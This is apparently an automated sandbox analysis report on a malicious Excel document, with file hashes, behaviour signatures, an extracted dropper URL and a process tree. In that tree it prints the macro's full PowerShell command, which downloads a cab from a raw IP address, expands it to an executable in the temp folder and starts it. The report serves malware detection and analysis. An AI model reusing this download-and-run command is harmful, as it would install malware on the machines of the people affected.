Overview

overview

10

Static

static

8

f0694d38c8...fc.xls

windows7-x64

10

f0694d38c8...fc.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    106s
  • max time network
    52s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    28-11-2022 16:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc.xls

  • Size

    24KB

  • MD5

    f584a24f2423784935912fec4c69cac3

  • SHA1

    6b441f8e8b387c0cf55f42a459bc1b6b475df097

  • SHA256

    f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc

  • SHA512

    9c9954a9537902119077f0278046b2dc5387f950bffc304d4c8c13189532b56b257ce6f89c9b7ddf5e123dc15c4b7c0a339d3e2d884dd8a3e7b7973be4cbab08

  • SSDEEP

    192:pBgqHa439gyLPUV+/T/D/199huyDycjCxGi+yE1fQ/yGCl7sXZBik9VWa9:po+LbthuQbCIia1fCz

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://92.63.88.87/sdeoefefs/dfssk.cab

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f0694d38c88c19bf3f891b90cbed7588a0234895c93f819a88bf27e22550f2fc.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1380
    • C:\Windows\SysWOW64\cmd.exe
      cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.cab'); expand C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.cab C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.exe; start C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.exe;
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1008
        • C:\Windows\SysWOW64\expand.exe
          "C:\Windows\system32\expand.exe" C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.cab C:\Users\Admin\AppData\Local\Temp\JIOiodfhioIH.exe
          4⤵
            PID:1732

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1008-66-0x0000000000000000-mapping.dmp
      Download
    • memory/1008-72-0x000000006BF20000-0x000000006C4CB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1008-70-0x000000006BF20000-0x000000006C4CB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1008-68-0x000000006BF20000-0x000000006C4CB000-memory.dmp
      Filesize

      5.7MB

      Download
    • memory/1380-58-0x00000000757A1000-0x00000000757A3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1380-57-0x0000000071EED000-0x0000000071EF8000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1380-74-0x0000000071EED000-0x0000000071EF8000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1380-64-0x00000000004F9000-0x00000000004FD000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1380-54-0x000000002F0D1000-0x000000002F0D4000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1380-63-0x00000000004F9000-0x00000000004FD000-memory.dmp
      Filesize

      16KB

      Download
    • memory/1380-60-0x000000000058B000-0x0000000000590000-memory.dmp
      Filesize

      20KB

      Download
    • memory/1380-59-0x000000000058B000-0x0000000000590000-memory.dmp
      Filesize

      20KB

      Download
    • memory/1380-69-0x0000000071EED000-0x0000000071EF8000-memory.dmp
      Filesize

      44KB

      Download
    • memory/1380-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1380-73-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1380-55-0x0000000070F01000-0x0000000070F03000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1528-65-0x0000000000000000-mapping.dmp
      Download
    • memory/1732-71-0x0000000000000000-mapping.dmp
      Download